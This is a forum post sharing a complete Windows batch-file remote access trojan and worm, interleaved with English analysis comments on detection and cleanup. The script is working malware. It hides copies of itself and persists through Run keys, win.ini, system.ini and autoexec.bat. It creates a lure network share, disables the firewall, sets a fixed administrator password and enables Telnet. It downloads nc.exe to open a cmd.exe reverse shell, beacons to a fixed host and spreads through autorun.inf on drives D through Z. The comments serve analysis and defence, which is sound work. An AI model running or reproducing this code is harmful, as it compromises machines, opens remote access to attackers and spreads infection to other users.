
Bat RAT

Noctambulaar

Не буду добавлять в дочернюю тему "Bat-Вирусы". Пока досмотрел до конца, чуть в оверфло не вышел [автор - oldschool cybernice :D ]

Код:
rem @echo off
rem Analysis: configuration block. Every dropped file name and Run value later
rem in the script is built from the name variable, so hunting should key on
rem behaviour and locations rather than on the literal string process.
rem --------------------------------file name----------------------------------
set name=process
rem --------------------------------probe settings--------------------------------------
rem Analysis: dest and port are the remote host and TCP port that the generated
rem printer.bat contacts. time is used as a ping count, which acts as the delay
rem between attempts.
set dest=192.168.2.100
set port=6666
set time=300
rem ---------------------------------ftp--------------------------------------
rem Analysis: user and pass are written in clear text into an FTP command file,
rem file is the binary fetched from dest, and param is the argument string the
rem fetched binary is started with. The argument string shown looks like
rem netcat-style options that attach cmd.exe to an outbound connection.
set user=smac69
set pass=123
set file=nc.exe
set param=192.168.2.100 12345 -e cmd.exe -d

rem ---------------------script backup----------------------
rem Analysis: first-run branch. If desktop.bat is already present in the
rem Windows directory the script continues at next0. Otherwise it copies itself
rem there, writes desktop.vbs which runs that copy with window style 0, starts
rem the launcher and jumps to the kraj label at the end of the file.
rem Indicators: desktop.bat and desktop.vbs in the Windows directory, and a
rem script host process starting a batch file with no visible window.

if exist %windir%\desktop.bat goto next0
copy %0 %windir%\desktop.bat
rem attrib +H %windir%\desktop.bat
echo CreateObject("Wscript.Shell").Run "%windir%\desktop.bat",0 > %windir%\desktop.vbs
start %windir%\desktop.vbs
goto kraj

rem -------------------vbs scripts--------------------- 
rem Analysis: writes three one-line VBS launchers, each skipped when the file
rem already exists. Locations: the All Users Startup folder, system32 and the
rem Windows directory. Each launcher runs a batch copy with window style 0.
rem Indicator: a .vbs file in the All Users Startup folder whose only content
rem is a Wscript.Shell Run call pointing at a .bat under the Windows directory.

:next0
if exist "%allusersprofile%\Start Menu\Programs\Startup\%name%.vbs" goto next1
echo CreateObject("Wscript.Shell").Run "%windir%\system32\%name%.bat",0 > "%allusersprofile%\Start Menu\Programs\Startup\%name%.vbs"

:next1
if exist %windir%\system32\%name%.vbs goto next2
echo CreateObject("Wscript.Shell").Run "%windir%\system32\%name%.bat",0 > %windir%\system32\%name%.vbs

:next2
if exist %windir%\%name%.vbs goto point1
echo CreateObject("Wscript.Shell").Run "%windir%\%name%.bat",0 > %windir%\%name%.vbs

rem --------------------autoexec.bat--------------------
rem Analysis: overwrites autoexec.bat on the system drive with a copy of this
rem script. The line is only reached when the Windows directory launcher was
rem just created, because the check under next2 otherwise jumps to point1.
rem Remediation must restore or delete autoexec.bat, not only the named copies.

copy %0 %systemdrive%\autoexec.bat

rem --------------------installation-----------
rem Analysis: places two copies of the script, one in system32 and one in the
rem Windows directory, and sets the hidden attribute on both. These are the
rem targets of the VBS launchers written earlier. Triage listings must include
rem hidden files or the copies will be missed.

:point1
if exist %windir%\system32\%name%.bat goto point2
copy %0 %windir%\system32\%name%.bat
attrib +H %windir%\system32\%name%.bat

:point2
if exist %windir%\%name%.bat goto point24
copy %0 %windir%\%name%.bat
attrib +H %windir%\%name%.bat

rem ---------------------folder sharing------------------
rem Analysis: social-engineering lure. Creates a directory with an enticing
rem name under the All Users profile, drops a copy of the script in it as
rem shortcut.bat and publishes the directory as a network share of the same
rem name. Anyone browsing the share who opens shortcut.bat runs the script.
rem Detection: a new share created by net.exe from a script context, and a
rem share whose path is under the All Users profile. Review the share list
rem during cleanup and remove the share as well as the directory.

:point24
if exist "%allusersprofile%\my girlfriend nude pictures\shortcut.bat" goto point26
md "%allusersprofile%\my girlfriend nude pictures"
copy %0 "%allusersprofile%\my girlfriend nude pictures\shortcut.bat"
net share "my girlfriend nude pictures"="%allusersprofile%\my girlfriend nude pictures"


rem ----------------------probe-------------------------------
rem Analysis: generates a second script pair, printer.vbs and printer.bat,
rem under the system32 spool directory. The generated batch file loops forever:
rem it pings localhost time times as a delay, pings dest once, then runs telnet
rem against dest and port. The values of time, dest and port are expanded when
rem the file is written, so the generated file contains them literally.
rem Persistence is an HKLM Run value named printer that points at printer.vbs.
rem Detection: a Run value referencing a .vbs under the spool directory,
rem repeated telnet.exe launches by cmd.exe, and outbound connections to one
rem fixed host and port at a regular interval.

:point26
if exist %windir%\system32\spool\printer.vbs goto point3
echo CreateObject("Wscript.Shell").Run "%windir%\system32\spool\printer.bat",0 > "%windir%\system32\spool\printer.vbs"
echo @echo off > "%windir%\system32\spool\printer.bat"
echo :loop >> "%windir%\system32\spool\printer.bat"
echo ping 127.0.0.1 -n %time% >> "%windir%\system32\spool\printer.bat"
echo rem ------------------------------------------------------------ >> "%windir%\system32\spool\printer.bat"
echo ping %dest% -n 1 >> "%windir%\system32\spool\printer.bat"
echo telnet %dest% %port% >> %windir%\system32\spool\printer.bat
echo goto loop >> %windir%\system32\spool\printer.bat
REG  add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v printer /t REG_SZ /d %windir%\system32\spool\printer.vbs /f       > nul
start %windir%\system32\spool\printer.vbs

rem --------------------autorun---------------------------------
rem Analysis: registers the VBS launchers in four logon and boot locations.
rem 1. HKLM Run value named after the name variable, pointing at the launcher
rem    in the Windows directory.
rem 2. HKCU Run value of the same name, pointing at the launcher in system32.
rem 3. run and load entries appended to win.ini.
rem 4. a shell entry appended to system.ini.
rem The force switch on REG add overwrites any existing value of that name
rem without prompting. Cleanup has to cover all four locations.

:point3
REG  add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v %name% /t REG_SZ /d %WINDIR%\%name%.vbs /f       > nul
REG  add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v %name% /t REG_SZ /d %WINDIR%\system32\%name%.vbs /f       > nul

rem Analysis: VirusName1 is only an alias for echo. The lines below are
rem appended with no existence check, so win.ini and system.ini may contain
rem repeated entries after several runs.
set VirusName1=echo
%VIRUSNAME1% [windows]                     >> %WINDIR%\win.ini
%VIRUSNAME1% run=%WINDIR%\%name%.vbs                     >> %WINDIR%\win.ini
%VIRUSNAME1% load=%WINDIR%\%name%.vbs                     >> %WINDIR%\win.ini
%VIRUSNAME1% [boot]                        >> %WINDIR%\system.ini
%VIRUSNAME1% shell=explorer.exe %name%.vbs                        >> %WINDIR%\system.ini

rem Analysis: the seven lines below are disabled in the posted script. They
rem are a single-drive autorun.inf routine for drive d.
rem if exist d:\process.bat goto izvedba
rem copy process.bat d:\process.bat
rem attrib +H d:\process.bat
rem echo CreateObject("Wscript.Shell").Run "d:\process.bat",0 > d:\process.vbs
rem attrib +H d:\process.vbs
rem echo [Autorun] > d:\autorun.inf
rem echo open=process.vbs >> d:\autorun.inf


rem -----------------------telnet server setup---------------------
rem Analysis: weakens the host and opens remote access. In order: turns the
rem Windows Firewall off using the legacy netsh firewall context, sets the
rem password of the account named administrator to a fixed string, switches
rem the ntlmssp and tlntsvr services to automatic start, then starts both.
rem These commands need administrative rights to succeed.
rem Detection: firewall operational mode changed, a password set on the
rem built-in administrator account, a start-type change for the Telnet
rem service, and a new listener for the Telnet service.
rem Remediation: re-enable the firewall, rotate the administrator password,
rem stop and disable the Telnet service, and treat the account as compromised.

:izvedba

netsh firewall set opmode mode=disable
net user administrator sysadm
sc \\127.0.0.1 config ntlmssp start= auto password= sysadm
sc \\127.0.0.1 config tlntsvr start= auto password= sysadm
net start ntlmssp
net start telnet

rem ---------------------------ftp download----------------------------
rem Analysis: second-stage download, skipped when the file named by the file
rem variable is already in system32. The script builds an FTP command file
rem edit.ftp in the current directory containing the host, user name and
rem password in clear text, then runs ftp with that command file through a
rem hidden-window launcher run.vbs. After a short ping delay it copies the
rem fetched file into system32, hides it, registers an HKCU Run value for a
rem launcher named after the file, and starts that launcher with the param
rem string.
rem Indicators: edit.ftp, run.bat and run.vbs left in the working directory,
rem ftp.exe started with a command-file switch by a script, an unencrypted FTP
rem session to dest, and a hidden executable plus matching .vbs in system32.
rem The recovered edit.ftp gives responders the server address and account.

if exist %windir%\system32\%file% goto skip1
echo open %dest%>>edit.ftp
echo %user%>>edit.ftp
echo %pass%>>edit.ftp
echo dir>>edit.ftp
echo get %file%>>edit.ftp
echo !>>edit.ftp
echo ftp -s:edit.ftp >> run.bat
echo CreateObject("Wscript.Shell").Run "run.bat",0 > "run.vbs"
start run.vbs
ping 127.0.0.1 -n 3
copy %file% %windir%\system32\%file%
attrib +H %windir%\system32\%file%
REG  add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v %file% /t REG_SZ /d %WINDIR%\system32\%file%.vbs /f       > nul
echo CreateObject("Wscript.Shell").Run "%file% %param%",0 > %windir%\system32\%file%.vbs
attrib +H %windir%\system32\%file%.vbs
start %windir%\system32\%file%.vbs

rem Analysis: if the watchdog launcher backup.vbs already exists it is
rem started here, otherwise control moves to the loop label which creates it.
:skip1
if not exist %windir%\system\backup.vbs goto loop
start %windir%\system\backup.vbs

rem ------------------------recovery script-----------------------
rem Analysis: watchdog. The loop label is the head of the main cycle: the
rem replication section below jumps back here, so the script keeps running
rem with a short ping delay per pass. On a pass where backup.bat is missing
rem the script writes it line by line into the system directory and starts it
rem through backup.vbs with a hidden window.
rem The generated backup.bat checks, in a loop, for five artefacts: the
rem Startup folder launcher, the two .vbs launchers and the two .bat copies.
rem If any one is missing it starts desktop.vbs, which re-runs the installed
rem copy so the missing pieces are written again.
rem Remediation order matters: terminate the script host and cmd.exe
rem processes running backup.bat, printer.bat and the main script before
rem deleting files, and remove desktop.bat, desktop.vbs, backup.bat and
rem backup.vbs in the same pass, otherwise deleted artefacts reappear.

:loop
ping 127.0.0.1 -n 3
if exist %windir%\system\backup.vbs goto point4
echo CreateObject("Wscript.Shell").Run "%windir%\system\backup.bat",0 > "%windir%\system\backup.vbs"

:point4
if exist %windir%\system\backup.bat goto replikacija
echo @echo off > %windir%\system\backup.bat
echo :loop >> %windir%\system\backup.bat
echo ping 127.0.0.1 -n 3 >> %windir%\system\backup.bat
echo if exist "%allusersprofile%\Start Menu\Programs\Startup\%name%.vbs" goto next1 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next1 >> %windir%\system\backup.bat
echo if exist %windir%\system32\%name%.vbs goto next2 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next2 >> %windir%\system\backup.bat
echo if exist %windir%\%name%.vbs goto next3 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next3 >> %windir%\system\backup.bat
echo if exist %windir%\system32\%name%.bat goto next4 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next4 >> %windir%\system\backup.bat
echo if exist %windir%\%name%.bat goto next5 >> %windir%\system\backup.bat
echo goto recovery >> %windir%\system\backup.bat
echo :next5 >> %windir%\system\backup.bat
echo goto loop: >> %windir%\system\backup.bat
echo :recovery >> %windir%\system\backup.bat
echo start %windir%\desktop.vbs >> %windir%\system\backup.bat
echo goto loop: >> %windir%\system\backup.bat
start %windir%\system\backup.vbs

rem -----------------------------copy------------------------
rem Analysis: worm-style spreading through drive letters. The same sequence is
rem repeated per labelled section below for a fixed list of drive letters.
rem Each section creates a hidden directory named after the name variable in
rem the drive root, copies the script into it, writes a hidden .vbs launcher
rem in the root and writes a hidden autorun.inf whose open and ShellExecute
rem entries point at that launcher. After the last section the script jumps
rem back to the loop label, so newly attached or mapped drives are picked up
rem on a later pass.
rem Detection: a hidden autorun.inf in a drive root that references a .vbs
rem file, a hidden root directory containing a .bat of the same name, and
rem write bursts to several drive roots from one cmd.exe process.
rem Mitigation: disable AutoRun and AutoPlay by policy, for example through
rem the NoDriveTypeAutoRun setting, and scan removable and mapped drives that
rem were attached to an affected host before reusing them.

:replikacija

:D
if exist d:\%name%\%name%.bat goto E
md d:\%name%
attrib +H d:\%name%
copy %0 d:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > d:\%name%.vbs
attrib +H d:\%name%.vbs
echo [autorun] > d:\autorun.inf
echo;open=%name%.vbs >> d:\autorun.inf
echo ShellExecute=%name%.vbs >> d:\autorun.inf
echo UseAutoPlay=1 >> d:\autorun.inf
attrib +H d:\autorun.inf

:E
if exist e:\%name%\%name%.bat goto F
md e:\%name%
attrib +H e:\%name%
copy %0 e:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > e:\%name%.vbs
attrib +H e:\%name%.vbs
echo [autorun] > e:\autorun.inf
echo;open=%name%.vbs >> e:\autorun.inf
echo ShellExecute=%name%.vbs >> e:\autorun.inf
echo UseAutoPlay=1 >> e:\autorun.inf
attrib +H e:\autorun.inf

:F
if exist f:\%name%\%name%.bat goto G
md f:\%name%
attrib +H f:\%name%
copy %0 f:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > f:\%name%.vbs
attrib +H f:\%name%.vbs
echo [autorun] > f:\autorun.inf
echo;open=%name%.vbs >> f:\autorun.inf
echo ShellExecute=%name%.vbs >> f:\autorun.inf
echo UseAutoPlay=1 >> f:\autorun.inf
attrib +H f:\autorun.inf

:G
if exist g:\%name%\%name%.bat goto H
md g:\%name%
attrib +H g:\%name%
copy %0 g:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > g:\%name%.vbs
attrib +H g:\%name%.vbs
echo [autorun] > g:\autorun.inf
echo;open=%name%.vbs >> g:\autorun.inf
echo ShellExecute=%name%.vbs >> g:\autorun.inf
echo UseAutoPlay=1 >> g:\autorun.inf
attrib +H g:\autorun.inf

:H
if exist h:\%name%\%name%.bat goto I
md h:\%name%
attrib +H h:\%name%
copy %0 h:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > h:\%name%.vbs
attrib +H h:\%name%.vbs
echo [autorun] > h:\autorun.inf
echo;open=%name%.vbs >> h:\autorun.inf
echo ShellExecute=%name%.vbs >> h:\autorun.inf
echo UseAutoPlay=1 >> h:\autorun.inf
attrib +H h:\autorun.inf

:I
if exist i:\%name%\%name%.bat goto J
md i:\%name%
attrib +H i:\%name%
copy %0 i:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > i:\%name%.vbs
attrib +H i:\%name%.vbs
echo [autorun] > i:\autorun.inf
echo;open=%name%.vbs >> i:\autorun.inf
echo ShellExecute=%name%.vbs >> i:\autorun.inf
echo UseAutoPlay=1 >> i:\autorun.inf
attrib +H i:\autorun.inf

:J
if exist j:\%name%\%name%.bat goto X
md j:\%name%
attrib +H j:\%name%
copy %0 j:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > j:\%name%.vbs
attrib +H j:\%name%.vbs
echo [autorun] > j:\autorun.inf
echo;open=%name%.vbs >> j:\autorun.inf
echo ShellExecute=%name%.vbs >> j:\autorun.inf
echo UseAutoPlay=1 >> j:\autorun.inf
attrib +H j:\autorun.inf

:X
if exist c:\%name%\%name%.bat goto Y
md x:\%name%
attrib +H x:\%name%
copy %0 x:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > x:\%name%.vbs
attrib +H x:\%name%.vbs
echo [autorun] > x:\autorun.inf
echo;open=%name%.vbs >> x:\autorun.inf
echo ShellExecute=%name%.vbs >> x:\autorun.inf
echo UseAutoPlay=1 >> x:\autorun.inf
attrib +H x:\autorun.inf

:Y
if exist y:\%name%\%name%.bat goto Z
md y:\%name%
attrib +H y:\%name%
copy %0 y:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > y:\%name%.vbs
attrib +H y:\%name%.vbs
echo [autorun] > y:\autorun.inf
echo;open=%name%.vbs >> y:\autorun.inf
echo ShellExecute=%name%.vbs >> y:\autorun.inf
echo UseAutoPlay=1 >> y:\autorun.inf
attrib +H y:\autorun.inf

:Z
if exist z:\%name%\%name%.bat goto loop
md z:\%name%
attrib +H z:\%name%
copy %0 z:\%name%\%name%.bat
echo CreateObject("Wscript.Shell").Run "\%name%\%name%.bat",0 > z:\%name%.vbs
attrib +H z:\%name%.vbs
echo [autorun] > z:\autorun.inf
echo;open=%name%.vbs >> z:\autorun.inf
echo ShellExecute=%name%.vbs >> z:\autorun.inf
echo UseAutoPlay=1 >> z:\autorun.inf
attrib +H z:\autorun.inf

goto loop

rem Analysis: kraj is the exit label used by the first-run branch at the top
rem of the script. The text after the label name appears to be a remark added
rem by the forum poster and is not part of the script logic.
:kraj  -- видимо это автор.
 

